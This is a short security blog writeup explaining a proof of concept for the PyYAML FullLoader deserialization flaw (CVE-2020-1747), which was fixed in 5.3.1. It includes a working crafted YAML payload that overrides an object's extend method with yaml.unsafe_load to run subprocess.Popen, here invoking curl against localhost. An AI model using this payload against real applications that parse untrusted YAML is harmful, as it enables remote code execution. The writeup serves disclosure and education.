Skip to main content

notes and writeups

CVE-2020-1747 PyYAML PoC

tl;dr ready to go script available at my Gist

Recently there was a vulnerability discovered in Python’s PyYAML library, which allowed for arbitraty code execution through YAML data deserialization. Original issue report and NVD’s vulnerability description have enough details about the case, so below I’ll just outline how to actually make it work.

Commits and tests linked in Github’s issue show, that construct_python_object_apply function present in FullContructor (being used by FullLoader) is able to create a “state” property of an object being created. This property is possible to be set through the input passed to FullLoader and therefore through user input from the file being loaded. The “state” property can have attributes, which also can be specified inside loaded YAML file. The constructor though does not check, whether attributes of this “state” passed by user are private class attributes, nor if the attribute conflicts with preexisting extend method. This way those attributes and methods can be overriden.

An example below shows a crafted YAML file, which results in making an HTTP request with curl.

- !!python/object/new:yaml.MappingNode
  listitems: !!str '!!python/object/apply:subprocess.Popen [["curl", "127.0.0.1/rce"]]'
  state:
    tag: !!str dummy
    value: !!str dummy
    extend: !!python/name:yaml.unsafe_load

First we define desired constructor, in this case PyYAML’s MappingNode because the structure to be loaded is supposed to be Python’s mapping (other types to choose contain “scalar” and “sequence”). Next let’s take a look at the state property - tag and value attributes are mandatory, so we’ll just pass whatever into them. Next, the extent attribute is specified. See how extend method is used in the code of FullContructor:

def construct_python_object_apply(self, suffix, node, newobj=False):
  # ...
  # some code ommited here
  #
  instance = self.make_python_instance(suffix, node, args, kwds, newobj)
  if state:
      self.set_python_instance_state(instance, state)
  if listitems:
      instance.extend(listitems)
  if dictitems:
      for key in dictitems:
          instance[key] = dictitems[key]
  return instance

We see that extend method belonging to some “instance” object is run. Since the “instance” has previously a “state” set based on our input, now the extend method is overriden with yaml.unsafe_load function. The extend method receives a listitems variable as input, which we also specify. In our case this is another simple PyYAML-structured data, which imports and runs subprocess.Popen function. The data is casted to string, so later it can be easily pasted into unsafe_load. Otherwise PyYAML would try to make a Python object out of it.

This way we replaced the extend method with our yaml.unsafe_load, which is known for it’s deserialization risks, and passed a YAML payload nested inside the actual YAML file.

Thanks to ret2libc for discovering and reporting this problem. The vulnerability was fixed in PyYAML 5.3.1 which was made available on PyPi shortly after issue publication, so thanks to the PyYAML team for that.